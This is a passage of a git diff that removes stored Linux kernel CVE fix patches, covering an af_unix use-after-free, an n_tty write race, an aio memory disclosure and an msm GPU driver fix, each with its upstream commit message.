unix_state_lock(sk); -+ - err = 0; -- unix_state_lock(sk); - if (unix_peer(sk) == other) { - unix_peer(sk) = NULL; -+ 
unix_dgram_peer_wake_disconnect_wakeup(sk, other); -+ - unix_state_unlock(sk); - - unix_dgram_disconnected(sk, other); -@@ -1592,21 +1716,38 @@ restart: - goto out_unlock; - } - -- if (unix_peer(other) != sk && unix_recvq_full(other)) { -- if (!timeo) { -- err = -EAGAIN; -- goto out_unlock; -+ if (unlikely(unix_peer(other) != sk && unix_recvq_full(other))) { -+ if (timeo) { -+ timeo = unix_wait_for_peer(other, timeo); -+ -+ err = sock_intr_errno(timeo); -+ if (signal_pending(current)) -+ goto out_free; -+ -+ goto restart; - } - -- timeo = unix_wait_for_peer(other, timeo); -+ if (!sk_locked) { -+ unix_state_unlock(other); -+ unix_state_double_lock(sk, other); -+ } - -- err = sock_intr_errno(timeo); -- if (signal_pending(current)) -- goto out_free; -+ if (unix_peer(sk) != other || -+ unix_dgram_peer_wake_me(sk, other)) { -+ err = -EAGAIN; -+ sk_locked = 1; -+ goto out_unlock; -+ } - -- goto restart; -+ if (!sk_locked) { -+ sk_locked = 1; -+ goto restart_locked; -+ } - } - -+ if (unlikely(sk_locked)) -+ unix_state_unlock(sk); -+ - if (sock_flag(other, SOCK_RCVTSTAMP)) - __net_timestamp(skb); - maybe_add_creds(skb, sock, other); -@@ -1620,6 +1761,8 @@ restart: - return len; - - out_unlock: -+ if (sk_locked) -+ unix_state_unlock(sk); - unix_state_unlock(other); - out_free: - kfree_skb(skb); -@@ -2476,14 +2619,16 @@ static unsigned int unix_dgram_poll(struct file *file, struct socket *sock, - return mask; - - writable = unix_writable(sk); -- other = unix_peer_get(sk); -- if (other) { -- if (unix_peer(other) != sk) { -- sock_poll_wait(file, &unix_sk(other)->peer_wait, wait); -- if (unix_recvq_full(other)) -- writable = 0; -- } -- sock_put(other); -+ if (writable) { -+ unix_state_lock(sk); -+ -+ other = unix_peer(sk); -+ if (other && unix_peer(other) != sk && -+ unix_recvq_full(other) && -+ unix_dgram_peer_wake_me(sk, other)) -+ writable = 0; -+ -+ unix_state_unlock(sk); - } - - if (writable) --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2013-7446/^4.3/0002.patch b/Patches/Linux_CVEs/CVE-2013-7446/^4.3/0002.patch
deleted file mode 100644
index 00f6946b..00000000
--- a/Patches/Linux_CVEs/CVE-2013-7446/^4.3/0002.patch
+++ /dev/null
@@ -1,334 +0,0 @@ -From 8a292b04183e82d59721ab0893e4216010aa3db9 Mon Sep 17 00:00:00 2001 -From: Rainer Weikusat -Date: Fri, 20 Nov 2015 22:07:23 +0000 -Subject: [PATCH] BACKPORT: unix: avoid use-after-free in ep_remove_wait_queue - -Rainer Weikusat writes: -An AF_UNIX datagram socket being the client in an n:1 association with -some server socket is only allowed to send messages to the server if the -receive queue of this socket contains at most sk_max_ack_backlog -datagrams. This implies that prospective writers might be forced to go -to sleep despite none of the message presently enqueued on the server -receive queue were sent by them. In order to ensure that these will be -woken up once space becomes again available, the present unix_dgram_poll -routine does a second sock_poll_wait call with the peer_wait wait queue -of the server socket as queue argument (unix_dgram_recvmsg does a wake -up on this queue after a datagram was received). This is inherently -problematic because the server socket is only guaranteed to remain alive -for as long as the client still holds a reference to it. In case the -connection is dissolved via connect or by the dead peer detection logic -in unix_dgram_sendmsg, the server socket may be freed despite "the -polling mechanism" (in particular, epoll) still has a pointer to the -corresponding peer_wait queue. There's no way to forcibly deregister a -wait queue with epoll. - -Based on an idea by Jason Baron, the patch below changes the code such -that a wait_queue_t belonging to the client socket is enqueued on the -peer_wait queue of the server whenever the peer receive queue full -condition is detected by either a sendmsg or a poll. A wake up on the -peer queue is then relayed to the ordinary wait queue of the client -socket via wake function. 
The connection to the peer wait queue is again -dissolved if either a wake up is about to be relayed or the client -socket reconnects or a dead peer is detected or the client socket is -itself closed. This enables removing the second sock_poll_wait from -unix_dgram_poll, thus avoiding the use-after-free, while still ensuring -that no blocked writer sleeps forever. - -Signed-off-by: Rainer Weikusat -Fixes: ec0d215f9420 ("af_unix: fix 'poll for write'/connected DGRAM sockets") -Reviewed-by: Jason Baron -Signed-off-by: David S. Miller - -Bug: 29119002 -(cherry picked from commit 7d267278a9ece963d77eefec61630223fce08c6c) -Signed-off-by: Aarthi Thiruvengadam - -Change-Id: Ia374ee061195088f8c777940baa75cedbe897f4e ---- - include/net/af_unix.h | 1 + - net/unix/af_unix.c | 183 ++++++++++++++++++++++++++++++++++++++++++++------ - 2 files changed, 165 insertions(+), 19 deletions(-) - -diff --git a/include/net/af_unix.h b/include/net/af_unix.h -index dbdfd2b0f3b3d..9120783132e71 100644 ---- a/include/net/af_unix.h -+++ b/include/net/af_unix.h -@@ -62,6 +62,7 @@ struct unix_sock { - #define UNIX_GC_CANDIDATE 0 - #define UNIX_GC_MAYBE_CYCLE 1 - struct socket_wq peer_wq; -+ wait_queue_t peer_wake; - }; - #define unix_sk(__sk) ((struct unix_sock *)__sk) - -diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c -index 924108f17b9a6..5e6323792a5e0 100644 ---- a/net/unix/af_unix.c -+++ b/net/unix/af_unix.c -@@ -314,6 +314,118 @@ static struct sock *unix_find_socket_byinode(struct inode *i) - return s; - } - -+/* Support code for asymmetrically connected dgram sockets -+ * -+ * If a datagram socket is connected to a socket not itself connected -+ * to the first socket (eg, /dev/log), clients may only enqueue more -+ * messages if the present receive queue of the server socket is not -+ * "too large". This means there's a second writeability condition -+ * poll and sendmsg need to test. 
The dgram recv code will do a wake -+ * up on the peer_wait wait queue of a socket upon reception of a -+ * datagram which needs to be propagated to sleeping would-be writers -+ * since these might not have sent anything so far. This can't be -+ * accomplished via poll_wait because the lifetime of the server -+ * socket might be less than that of its clients if these break their -+ * association with it or if the server socket is closed while clients -+ * are still connected to it and there's no way to inform "a polling -+ * implementation" that it should let go of a certain wait queue -+ * -+ * In order to propagate a wake up, a wait_queue_t of the client -+ * socket is enqueued on the peer_wait queue of the server socket -+ * whose wake function does a wake_up on the ordinary client socket -+ * wait queue. This connection is established whenever a write (or -+ * poll for write) hit the flow control condition and broken when the -+ * association to the server socket is dissolved or after a wake up -+ * was relayed. 
-+ */ -+ -+static int unix_dgram_peer_wake_relay(wait_queue_t *q, unsigned mode, int flags, -+ void *key) -+{ -+ struct unix_sock *u; -+ wait_queue_head_t *u_sleep; -+ -+ u = container_of(q, struct unix_sock, peer_wake); -+ -+ __remove_wait_queue(&unix_sk(u->peer_wake.private)->peer_wait, -+ q); -+ u->peer_wake.private = NULL; -+ -+ /* relaying can only happen while the wq still exists */ -+ u_sleep = sk_sleep(&u->sk); -+ if (u_sleep) -+ wake_up_interruptible_poll(u_sleep, key); -+ -+ return 0; -+} -+ -+static int unix_dgram_peer_wake_connect(struct sock *sk, struct sock *other) -+{ -+ struct unix_sock *u, *u_other; -+ int rc; -+ -+ u = unix_sk(sk); -+ u_other = unix_sk(other); -+ rc = 0; -+ spin_lock(&u_other->peer_wait.lock); -+ -+ if (!u->peer_wake.private) { -+ u->peer_wake.private = other; -+ __add_wait_queue(&u_other->peer_wait, &u->peer_wake); -+ -+ rc = 1; -+ } -+ -+ spin_unlock(&u_other->peer_wait.lock); -+ return rc; -+} -+ -+static void unix_dgram_peer_wake_disconnect(struct sock *sk, -+ struct sock *other) -+{ -+ struct unix_sock *u, *u_other; -+ -+ u = unix_sk(sk); -+ u_other = unix_sk(other); -+ spin_lock(&u_other->peer_wait.lock); -+ -+ if (u->peer_wake.private == other) { -+ __remove_wait_queue(&u_other->peer_wait, &u->peer_wake); -+ u->peer_wake.private = NULL; -+ } -+ -+ spin_unlock(&u_other->peer_wait.lock); -+} -+ -+static void unix_dgram_peer_wake_disconnect_wakeup(struct sock *sk, -+ struct sock *other) -+{ -+ unix_dgram_peer_wake_disconnect(sk, other); -+ wake_up_interruptible_poll(sk_sleep(sk), -+ POLLOUT | -+ POLLWRNORM | -+ POLLWRBAND); -+} -+ -+/* preconditions: -+ * - unix_peer(sk) == other -+ * - association is stable -+ */ -+static int unix_dgram_peer_wake_me(struct sock *sk, struct sock *other) -+{ -+ int connected; -+ -+ connected = unix_dgram_peer_wake_connect(sk, other); -+ -+ if (unix_recvq_full(other)) -+ return 1; -+ -+ if (connected) -+ unix_dgram_peer_wake_disconnect(sk, other); -+ -+ return 0; -+} -+ - static inline int 
unix_writable(struct sock *sk) - { - return (atomic_read(&sk->sk_wmem_alloc) << 2) <= sk->sk_sndbuf; -@@ -418,6 +530,8 @@ static void unix_release_sock(struct sock *sk, int embrion) - skpair->sk_state_change(skpair); - sk_wake_async(skpair, SOCK_WAKE_WAITD, POLL_HUP); - } -+ -+ unix_dgram_peer_wake_disconnect(sk, skpair); - sock_put(skpair); /* It may now die */ - unix_peer(sk) = NULL; - } -@@ -651,6 +765,7 @@ static struct sock *unix_create1(struct net *net, struct socket *sock) - INIT_LIST_HEAD(&u->link); - mutex_init(&u->readlock); /* single task reading lock */ - init_waitqueue_head(&u->peer_wait); -+ init_waitqueue_func_entry(&u->peer_wake, unix_dgram_peer_wake_relay); - unix_insert_socket(unix_sockets_unbound(sk), sk); - out: - if (sk == NULL) -@@ -1020,6 +1135,8 @@ static int unix_dgram_connect(struct socket *sock, struct sockaddr *addr, - if (unix_peer(sk)) { - struct sock *old_peer = unix_peer(sk); - unix_peer(sk) = other; -+ unix_dgram_peer_wake_disconnect_wakeup(sk, old_peer); -+ - unix_state_double_unlock(sk, other); - - if (other != old_peer) -@@ -1459,6 +1576,7 @@ static int unix_dgram_sendmsg(struct kiocb *kiocb, struct socket *sock, - struct scm_cookie tmp_scm; - int max_level; - int data_len = 0; -+ int sk_locked; - - if (NULL == siocb->scm) - siocb->scm = &tmp_scm; -@@ -1535,12 +1653,14 @@ static int unix_dgram_sendmsg(struct kiocb *kiocb, struct socket *sock, - goto out_free; - } - -+ sk_locked = 0; - unix_state_lock(other); -+restart_locked: - err = -EPERM; - if (!unix_may_send(sk, other)) - goto out_unlock; - -- if (sock_flag(other, SOCK_DEAD)) { -+ if (unlikely(sock_flag(other, SOCK_DEAD))) { - /* - * Check with 1003.1g - what should - * datagram error -@@ -1548,10 +1668,14 @@ static int unix_dgram_sendmsg(struct kiocb *kiocb, struct socket *sock, - unix_state_unlock(other); - sock_put(other); - -+ if (!sk_locked) -+ unix_state_lock(sk); -+ - err = 0; -- unix_state_lock(sk); - if (unix_peer(sk) == other) { - unix_peer(sk) = NULL; -+ 
unix_dgram_peer_wake_disconnect_wakeup(sk, other); -+ - unix_state_unlock(sk); - - unix_dgram_disconnected(sk, other); -@@ -1577,21 +1701,38 @@ static int unix_dgram_sendmsg(struct kiocb *kiocb, struct socket *sock, - goto out_unlock; - } - -- if (unix_peer(other) != sk && unix_recvq_full(other)) { -- if (!timeo) { -- err = -EAGAIN; -- goto out_unlock; -+ if (unlikely(unix_peer(other) != sk && unix_recvq_full(other))) { -+ if (timeo) { -+ timeo = unix_wait_for_peer(other, timeo); -+ -+ err = sock_intr_errno(timeo); -+ if (signal_pending(current)) -+ goto out_free; -+ -+ goto restart; - } - -- timeo = unix_wait_for_peer(other, timeo); -+ if (!sk_locked) { -+ unix_state_unlock(other); -+ unix_state_double_lock(sk, other); -+ } - -- err = sock_intr_errno(timeo); -- if (signal_pending(current)) -- goto out_free; -+ if (unix_peer(sk) != other || -+ unix_dgram_peer_wake_me(sk, other)) { -+ err = -EAGAIN; -+ sk_locked = 1; -+ goto out_unlock; -+ } - -- goto restart; -+ if (!sk_locked) { -+ sk_locked = 1; -+ goto restart_locked; -+ } - } - -+ if (unlikely(sk_locked)) -+ unix_state_unlock(sk); -+ - if (sock_flag(other, SOCK_RCVTSTAMP)) - __net_timestamp(skb); - maybe_add_creds(skb, sock, other); -@@ -1605,6 +1746,8 @@ static int unix_dgram_sendmsg(struct kiocb *kiocb, struct socket *sock, - return len; - - out_unlock: -+ if (sk_locked) -+ unix_state_unlock(sk); - unix_state_unlock(other); - out_free: - kfree_skb(skb); -@@ -2243,14 +2386,16 @@ static unsigned int unix_dgram_poll(struct file *file, struct socket *sock, - return mask; - - writable = unix_writable(sk); -- other = unix_peer_get(sk); -- if (other) { -- if (unix_peer(other) != sk) { -- sock_poll_wait(file, &unix_sk(other)->peer_wait, wait); -- if (unix_recvq_full(other)) -- writable = 0; -- } -- sock_put(other); -+ if (writable) { -+ unix_state_lock(sk); -+ -+ other = unix_peer(sk); -+ if (other && unix_peer(other) != sk && -+ unix_recvq_full(other) && -+ unix_dgram_peer_wake_me(sk, other)) -+ writable = 0; -+ -+ 
unix_state_unlock(sk);
- }
-
- if (writable)
diff --git a/Patches/Linux_CVEs/CVE-2013-7446/^4.3/0003.patch b/Patches/Linux_CVEs/CVE-2013-7446/^4.3/0003.patch
deleted file mode 100644
index 65238ba8..00000000
--- a/Patches/Linux_CVEs/CVE-2013-7446/^4.3/0003.patch
+++ /dev/null
@@ -1,56 +0,0 @@ -From 5bed19c9f463f9078063363779548c50aea271a0 Mon Sep 17 00:00:00 2001 -From: Rainer Weikusat -Date: Thu, 11 Feb 2016 19:37:27 +0000 -Subject: [PATCH] UPSTREAM: af_unix: Guard against other == sk in - unix_dgram_sendmsg - -(cherry picked from commit a5527dda344fff0514b7989ef7a755729769daa1) - -The unix_dgram_sendmsg routine use the following test - -if (unlikely(unix_peer(other) != sk && unix_recvq_full(other))) { - -to determine if sk and other are in an n:1 association (either -established via connect or by using sendto to send messages to an -unrelated socket identified by address). This isn't correct as the -specified address could have been bound to the sending socket itself or -because this socket could have been connected to itself by the time of -the unix_peer_get but disconnected before the unix_state_lock(other). In -both cases, the if-block would be entered despite other == sk which -might either block the sender unintentionally or lead to trying to unlock -the same spin lock twice for a non-blocking send. Add a other != sk -check to guard against this. - -Fixes: 7d267278a9ec ("unix: avoid use-after-free in ep_remove_wait_queue") -Reported-By: Philipp Hahn -Signed-off-by: Rainer Weikusat -Tested-by: Philipp Hahn -Signed-off-by: David S. 
Miller - -Fixes: Change-Id: Ia374ee061195088f8c777940baa75cedbe897f4e - ("UPSTREAM: unix: avoid use-after-free in ep_remove_wait_queue") -Change-Id: I4ebef6a390df3487903b166b837e34c653e01cb2 -Signed-off-by: Amit Pundir -Bug: 29119002 ---- - net/unix/af_unix.c | 7 ++++++- - 1 file changed, 6 insertions(+), 1 deletion(-) - -diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c -index 5e6323792a5e0..204bee47aa10c 100644 ---- a/net/unix/af_unix.c -+++ b/net/unix/af_unix.c -@@ -1701,7 +1701,12 @@ static int unix_dgram_sendmsg(struct kiocb *kiocb, struct socket *sock, - goto out_unlock; - } - -- if (unlikely(unix_peer(other) != sk && unix_recvq_full(other))) { -+ /* other == sk && unix_peer(other) != sk if -+ * - unix_peer(sk) == NULL, destination address bound to sk -+ * - unix_peer(sk) == sk by time of get but disconnected before lock -+ */ -+ if (other != sk && -+ unlikely(unix_peer(other) != sk && unix_recvq_full(other))) { - if (timeo) { - timeo = unix_wait_for_peer(other, timeo); - diff --git a/Patches/Linux_CVEs/CVE-2014-0196/3.2/0002.patch b/Patches/Linux_CVEs/CVE-2014-0196/3.2/0002.patch deleted file mode 100644 index 21d68bf3..00000000 --- a/Patches/Linux_CVEs/CVE-2014-0196/3.2/0002.patch +++ /dev/null 
@@ -1,84 +0,0 @@
-From 1e5099713cefc67aa562f6d8fe43444f41baf52d Mon Sep 17 00:00:00 2001
-From: Peter Hurley
-Date: Sat, 3 May 2014 14:04:59 +0200
-Subject: n_tty: Fix n_tty_write crash when echoing in raw mode
-
-commit 4291086b1f081b869c6d79e5b7441633dc3ace00 upstream.
-
-The tty atomic_write_lock does not provide an exclusion guarantee for
-the tty driver if the termios settings are LECHO & !OPOST. And since
-it is unexpected and not allowed to call TTY buffer helpers like
-tty_insert_flip_string concurrently, this may lead to crashes when
-concurrect writers call pty_write. In that case the following two
-writers:
-* the ECHOing from a workqueue and
-* pty_write from the process
-race and can overflow the corresponding TTY buffer like follows.
-
-If we look into tty_insert_flip_string_fixed_flag, there is:
- int space = __tty_buffer_request_room(port, goal, flags);
- struct tty_buffer *tb = port->buf.tail;
- ...
- memcpy(char_buf_ptr(tb, tb->used), chars, space);
- ...
- tb->used += space;
-
-so the race of the two can result in something like this:
- A B
-__tty_buffer_request_room
- __tty_buffer_request_room
-memcpy(buf(tb->used), ...)
-tb->used += space;
- memcpy(buf(tb->used), ...) ->BOOM
-
-B's memcpy is past the tty_buffer due to the previous A's tb->used
-increment.
-
-Since the N_TTY line discipline input processing can output
-concurrently with a tty write, obtain the N_TTY ldisc output_lock to
-serialize echo output with normal tty writes. This ensures the tty
-buffer helper tty_insert_flip_string is not called concurrently and
-everything is fine.
-
-Note that this is nicely reproducible by an ordinary user using
-forkpty and some setup around that (raw termios + ECHO). And it is
-present in kernels at least after commit
-d945cb9cce20ac7143c2de8d88b187f62db99bdc (pty: Rework the pty layer to
-use the normal buffering logic) in 2.6.31-rc3.
-
-js: add more info to the commit log
-js: switch to bool
-js: lock unconditionally
-js: lock only the tty->ops->write call
-
-References: CVE-2014-0196
-Reported-and-tested-by: Jiri Slaby
-Signed-off-by: Peter Hurley
-Signed-off-by: Jiri Slaby
-Cc: Linus Torvalds
-Cc: Alan Cox
-Cc:
-Signed-off-by: Greg Kroah-Hartman
-[bwh: Backported to 3.2: output_lock is a member of struct tty_struct]
-Signed-off-by: Ben Hutchings
----
- drivers/tty/n_tty.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/tty/n_tty.c b/drivers/tty/n_tty.c
-index 0f8a785..bac83d8 100644
---- a/drivers/tty/n_tty.c
-+++ b/drivers/tty/n_tty.c
-@@ -1997,7 +1997,9 @@ static ssize_t n_tty_write(struct tty_struct *tty, struct file *file,
- tty->ops->flush_chars(tty);
- } else {
- while (nr > 0) {
-+ mutex_lock(&tty->output_lock);
- c = tty->ops->write(tty, b, nr);
-+ mutex_unlock(&tty->output_lock);
- if (c < 0) {
- retval = c;
- goto break_out;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-0196/3.4/0003.patch b/Patches/Linux_CVEs/CVE-2014-0196/3.4/0003.patch
deleted file mode 100644
index b7c78569..00000000
--- a/Patches/Linux_CVEs/CVE-2014-0196/3.4/0003.patch
+++ /dev/null
@@ -1,83 +0,0 @@
-From 9aabfc9e7775abbbcf534cdecccc4f12ee423b27 Mon Sep 17 00:00:00 2001
-From: Peter Hurley
-Date: Tue, 13 May 2014 14:36:46 -0700
-Subject: n_tty: Fix n_tty_write crash when echoing in raw mode
-
-The tty atomic_write_lock does not provide an exclusion guarantee for
-the tty driver if the termios settings are LECHO & !OPOST. And since
-it is unexpected and not allowed to call TTY buffer helpers like
-tty_insert_flip_string concurrently, this may lead to crashes when
-concurrect writers call pty_write. In that case the following two
-writers:
-* the ECHOing from a workqueue and
-* pty_write from the process
-race and can overflow the corresponding TTY buffer like follows.
-
-If we look into tty_insert_flip_string_fixed_flag, there is:
- int space = __tty_buffer_request_room(port, goal, flags);
- struct tty_buffer *tb = port->buf.tail;
- ...
- memcpy(char_buf_ptr(tb, tb->used), chars, space);
- ...
- tb->used += space;
-
-so the race of the two can result in something like this:
- A B
- __tty_buffer_request_room
- __tty_buffer_request_room
- memcpy(buf(tb->used), ...)
- tb->used += space;
- memcpy(buf(tb->used), ...) ->BOOM
-
-B's memcpy is past the tty_buffer due to the previous A's tb->used
-increment.
-
-Since the N_TTY line discipline input processing can output
-concurrently with a tty write, obtain the N_TTY ldisc output_lock to
-serialize echo output with normal tty writes. This ensures the tty
-buffer helper tty_insert_flip_string is not called concurrently and
-everything is fine.
-
-Note that this is nicely reproducible by an ordinary user using
-forkpty and some setup around that (raw termios + ECHO). And it is
-present in kernels at least after commit
-d945cb9cce20ac7143c2de8d88b187f62db99bdc (pty: Rework the pty layer to
-use the normal buffering logic) in 2.6.31-rc3.
-
-js: add more info to the commit log
-js: switch to bool
-js: lock unconditionally
-js: lock only the tty->ops->write call
-
-Signed-off-by: Peter Hurley
-Signed-off-by: Jiri Slaby
-Signed-off-by: Greg Kroah-Hartman
-Change-Id: I9e235db6ec2bb950f26bd8a23f6145dab5dc0a15
-Git-commit: 4291086b1f081b869c6d79e5b7441633dc3ace00
-Git-repo: git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
-Signed-off-by: Avijit Kanti Das
-[rsiddoji@codeaurora.org: resolve trivial merge conflicts]
-Signed-off-by: Ravi Kumar S
----
- drivers/tty/n_tty.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/drivers/tty/n_tty.c b/drivers/tty/n_tty.c
-index 8eb5573..54c46c8 100644
---- a/drivers/tty/n_tty.c
-+++ b/drivers/tty/n_tty.c
-@@ -1998,8 +1998,11 @@ static ssize_t n_tty_write(struct tty_struct *tty, struct file *file,
- if (tty->ops->flush_chars)
- tty->ops->flush_chars(tty);
- } else {
-+
- while (nr > 0) {
-+ mutex_lock(&tty->output_lock);
- c = tty->ops->write(tty, b, nr);
-+ mutex_unlock(&tty->output_lock);
- if (c < 0) {
- retval = c;
- goto break_out;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-0196/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-0196/ANY/0001.patch
deleted file mode 100644
index 2b19f407..00000000
--- a/Patches/Linux_CVEs/CVE-2014-0196/ANY/0001.patch
+++ /dev/null
@@ -1,80 +0,0 @@
-From 4291086b1f081b869c6d79e5b7441633dc3ace00 Mon Sep 17 00:00:00 2001
-From: Peter Hurley
-Date: Sat, 3 May 2014 14:04:59 +0200
-Subject: [PATCH] n_tty: Fix n_tty_write crash when echoing in raw mode
-
-The tty atomic_write_lock does not provide an exclusion guarantee for
-the tty driver if the termios settings are LECHO & !OPOST. And since
-it is unexpected and not allowed to call TTY buffer helpers like
-tty_insert_flip_string concurrently, this may lead to crashes when
-concurrect writers call pty_write. In that case the following two
-writers:
-* the ECHOing from a workqueue and
-* pty_write from the process
-race and can overflow the corresponding TTY buffer like follows.
-
-If we look into tty_insert_flip_string_fixed_flag, there is:
- int space = __tty_buffer_request_room(port, goal, flags);
- struct tty_buffer *tb = port->buf.tail;
- ...
- memcpy(char_buf_ptr(tb, tb->used), chars, space);
- ...
- tb->used += space;
-
-so the race of the two can result in something like this:
- A B
-__tty_buffer_request_room
- __tty_buffer_request_room
-memcpy(buf(tb->used), ...)
-tb->used += space;
- memcpy(buf(tb->used), ...) ->BOOM
-
-B's memcpy is past the tty_buffer due to the previous A's tb->used
-increment.
-
-Since the N_TTY line discipline input processing can output
-concurrently with a tty write, obtain the N_TTY ldisc output_lock to
-serialize echo output with normal tty writes. This ensures the tty
-buffer helper tty_insert_flip_string is not called concurrently and
-everything is fine.
-
-Note that this is nicely reproducible by an ordinary user using
-forkpty and some setup around that (raw termios + ECHO). And it is
-present in kernels at least after commit
-d945cb9cce20ac7143c2de8d88b187f62db99bdc (pty: Rework the pty layer to
-use the normal buffering logic) in 2.6.31-rc3.
-
-js: add more info to the commit log
-js: switch to bool
-js: lock unconditionally
-js: lock only the tty->ops->write call
-
-References: CVE-2014-0196
-Reported-and-tested-by: Jiri Slaby
-Signed-off-by: Peter Hurley
-Signed-off-by: Jiri Slaby
-Cc: Linus Torvalds
-Cc: Alan Cox
-Cc:
-Signed-off-by: Greg Kroah-Hartman
----
- drivers/tty/n_tty.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/tty/n_tty.c b/drivers/tty/n_tty.c
-index 41fe8a047d373..fe9d129c87351 100644
---- a/drivers/tty/n_tty.c
-+++ b/drivers/tty/n_tty.c
-@@ -2353,8 +2353,12 @@ static ssize_t n_tty_write(struct tty_struct *tty, struct file *file,
- if (tty->ops->flush_chars)
- tty->ops->flush_chars(tty);
- } else {
-+ struct n_tty_data *ldata = tty->disc_data;
-+
- while (nr > 0) {
-+ mutex_lock(&ldata->output_lock);
- c = tty->ops->write(tty, b, nr);
-+ mutex_unlock(&ldata->output_lock);
- if (c < 0) {
- retval = c;
- goto break_out;
diff --git a/Patches/Linux_CVEs/CVE-2014-0206/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-0206/ANY/0001.patch
deleted file mode 100644
index 7c80276a..00000000
--- a/Patches/Linux_CVEs/CVE-2014-0206/ANY/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From d36db46c2cba973557eb6138d22210c4e0cf17d6 Mon Sep 17 00:00:00 2001
-From: Benjamin LaHaise
-Date: Tue, 24 Jun 2014 13:32:51 -0400
-Subject: aio: fix kernel memory disclosure in io_getevents() introduced in
- v3.10
-
-commit edfbbf388f293d70bf4b7c0bc38774d05e6f711a upstream.
-
-A kernel memory disclosure was introduced in aio_read_events_ring() in v3.10
-by commit a31ad380bed817aa25f8830ad23e1a0480fef797. The changes made to
-aio_read_events_ring() failed to correctly limit the index into
-ctx->ring_pages[], allowing an attacked to cause the subsequent kmap() of
-an arbitrary page with a copy_to_user() to copy the contents into userspace.
-This vulnerability has been assigned CVE-2014-0206. Thanks to Mateusz and
-Petr for disclosing this issue.
-
-This patch applies to v3.12+. A separate backport is needed for 3.10/3.11.
-
-[jmoyer@redhat.com: backported to 3.10]
-Signed-off-by: Benjamin LaHaise
-Signed-off-by: Jeff Moyer
-Cc: Mateusz Guzik
-Cc: Petr Matousek
-Cc: Kent Overstreet
-Signed-off-by: Greg Kroah-Hartman
----
- fs/aio.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/fs/aio.c b/fs/aio.c
-index 8d2c997..ded94c4 100644
---- a/fs/aio.c
-+++ b/fs/aio.c
-@@ -717,6 +717,8 @@ static long aio_read_events_ring(struct kioctx *ctx,
- if (head == ctx->tail)
- goto out;
-
-+ head %= ctx->nr_events;
-+
- while (ret < nr) {
- long avail;
- struct io_event *ev;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-0972/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-0972/ANY/0001.patch
deleted file mode 100644
index 60c69649..00000000
--- a/Patches/Linux_CVEs/CVE-2014-0972/ANY/0001.patch
+++ /dev/null
@@ -1,181 +0,0 @@ -From 7613c9d520ee4d227e635f6db0270d4cf26102bc Mon Sep 17 00:00:00 2001 -From: Jordan Crouse -Date: Mon, 21 Apr 2014 15:04:54 -0600 -Subject: msm: kgsl: Protect CP_STATE_DEBUG_INDEX - -Put CP_STATE_DEBUG_INDEX and CP_STATE_DEBUG_DATA under protection -to keep it from being written from an IB1. Doing so however opens -up a subtle "feature" in the microcode: memory read opcodes turn off -protected mode in the microcode to do the read and then turns it -back on regardless of the initial state. This is a problem if the -memory read happens while protected mode is turned off and then we -try to access a protected register which then complains and goes boom. - -To account for this irregularity explicitly turn back off protected -mode in all the places where we know this will be a problem. - -Change-Id: Ic0dedbad1397ca9b80132241ac006560a615e042 -Signed-off-by: Jordan Crouse ---- - drivers/gpu/msm/adreno.c | 24 +++++++++++++----------- - drivers/gpu/msm/adreno.h | 10 ++++++++++ - drivers/gpu/msm/adreno_a3xx.c | 1 + - drivers/gpu/msm/kgsl_iommu.c | 16 ++++++++++++++++ - 4 files changed, 40 insertions(+), 11 deletions(-) - -diff --git a/drivers/gpu/msm/adreno.c b/drivers/gpu/msm/adreno.c -index 4b21218..9bd07c6 100644 ---- a/drivers/gpu/msm/adreno.c -+++ b/drivers/gpu/msm/adreno.c -@@ -1150,9 +1150,7 @@ static int adreno_iommu_setstate(struct kgsl_device *device, - uint32_t flags) - { - phys_addr_t pt_val; -- unsigned int link[230]; -- unsigned int *cmds = &link[0]; -- int sizedwords = 0; -+ unsigned int *link = NULL, *cmds; - struct adreno_device *adreno_dev = ADRENO_DEVICE(device); - int num_iommu_units; - struct kgsl_context *context; -@@ -1170,6 +1168,14 @@ static int adreno_iommu_setstate(struct kgsl_device *device, - if (context) - adreno_ctx = ADRENO_CONTEXT(context); - -+ link = kmalloc(PAGE_SIZE, GFP_KERNEL); -+ if (link == NULL) { -+ result = -ENOMEM; -+ goto done; -+ } -+ -+ cmds = link; -+ - result = kgsl_mmu_enable_clk(&device->mmu, 
KGSL_IOMMU_CONTEXT_USER); - - if (result) -@@ -1192,17 +1198,11 @@ static int adreno_iommu_setstate(struct kgsl_device *device, - cmds += _adreno_iommu_setstate_v1(device, cmds, pt_val, - num_iommu_units, flags); - -- sizedwords += (cmds - &link[0]); -- if (sizedwords == 0) { -- KGSL_DRV_ERR(device, "no commands generated\n"); -- BUG(); -- } - /* invalidate all base pointers */ - *cmds++ = cp_type3_packet(CP_INVALIDATE_STATE, 1); - *cmds++ = 0x7fff; -- sizedwords += 2; - -- if (sizedwords > (ARRAY_SIZE(link))) { -+ if ((unsigned int) (cmds - link) > (PAGE_SIZE / sizeof(unsigned int))) { - KGSL_DRV_ERR(device, "Temp command buffer overflow\n"); - BUG(); - } -@@ -1211,7 +1211,8 @@ static int adreno_iommu_setstate(struct kgsl_device *device, - * use the global timestamp for iommu clock disablement - */ - result = adreno_ringbuffer_issuecmds(device, adreno_ctx, -- KGSL_CMD_FLAGS_PMODE, &link[0], sizedwords); -+ KGSL_CMD_FLAGS_PMODE, link, -+ (unsigned int)(cmds - link)); - - /* - * On error disable the IOMMU clock right away otherwise turn it off -@@ -1225,6 +1226,7 @@ static int adreno_iommu_setstate(struct kgsl_device *device, - KGSL_IOMMU_CONTEXT_USER); - - done: -+ kfree(link); - kgsl_context_put(context); - return result; - } -diff --git a/drivers/gpu/msm/adreno.h b/drivers/gpu/msm/adreno.h -index 8e162ca..0b793fa 100644 ---- a/drivers/gpu/msm/adreno.h -+++ 